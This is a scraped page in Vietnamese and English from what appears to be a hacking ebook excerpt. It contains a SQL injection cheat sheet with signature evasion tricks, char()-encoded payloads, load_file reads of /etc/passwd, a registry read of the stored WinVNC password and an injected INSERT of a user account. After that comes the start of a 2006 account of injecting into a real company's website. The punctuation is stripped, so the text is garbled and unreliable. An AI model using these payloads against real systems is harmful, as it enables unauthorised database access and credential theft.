Tham khảo tài liệu 'hacker professional ebook part 224', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | - @rootkey HKEY_LOCAL_MACHINE - @key SOFTWARE ORL WinVNC3 Default - @value_name password - @value @out output - select cast @out as bigint as x into TEMP-- - and 1 in select cast x as varchar from temp -- Signature Evasion. Evading OR 1 1 Signature - OR unusual unusual - OR something some thing - OR text N text - OR something like some - OR 2 1 - OR text t - OR whatever in whatever - OR 2 BETWEEN 1 and 3 Input Validation Circumvention using Char . Inject without quotes string -- or username like char 37 Inject with quotes string root -- union select from users where login char 114 111 111 116 load files in unions string etc passwd -- union select 1 load_file char 47 101 116 99 47 112 97 115 115 119 100 1 1 1 Check for existing files string -- and 1 if load_file char 110 46 101 120 116 char 39 3 9 1 0 Signature Evasion using comments. -- OR 1 1 -- Username or 1 -- Password 1-- -- UNI ON SEL ECT -- Oracle EXECUTE IMMEDIATE SEL ECT US ER -- MS SQL EXEC SEL ECT US ER without quotes. -- INSERT INTO Users Login Password Level VALUES char 0x70 char 0x65 char 0x74 char 0x65 char 0x72 char 0x70 char 0x65 char 0x74 char 0x65 char 0x72 0x64 Greets kaneda modem wildcard black and pulltheplug. 2006-03-28 Pip VNISS SQL injection without sa Bài viết này tình cờ tìm lại được trong Yahoo Mail. Lâu rồi nên nó đã fixAA. Tham khảo thui OK Hôm nay rảnh rỗi quạ xin trình bày kỹ thuật hack 1 server sử dụng MsSQL mà không cần user hiện tại phải là sa hoặc là dbo .Mục tiêu lần này là một trang Web của 1 công ty dịch vụ bảo vệ của Việt Nam là . Trong lúc đang xem trang web tình cờ ngứa tay quạ thêm vào một dấu vào links xem có gì xẩy ra thì bùm thongtin mathongtin tt-98112972003 --- Microsoft OLE DB Provider for ODBC Drivers 0x80040E14 Microsoft ODBC SQL Server Driver SQL Server Unclosed quotation mark before the character string tt-98112972003 . thongtin line 15 ---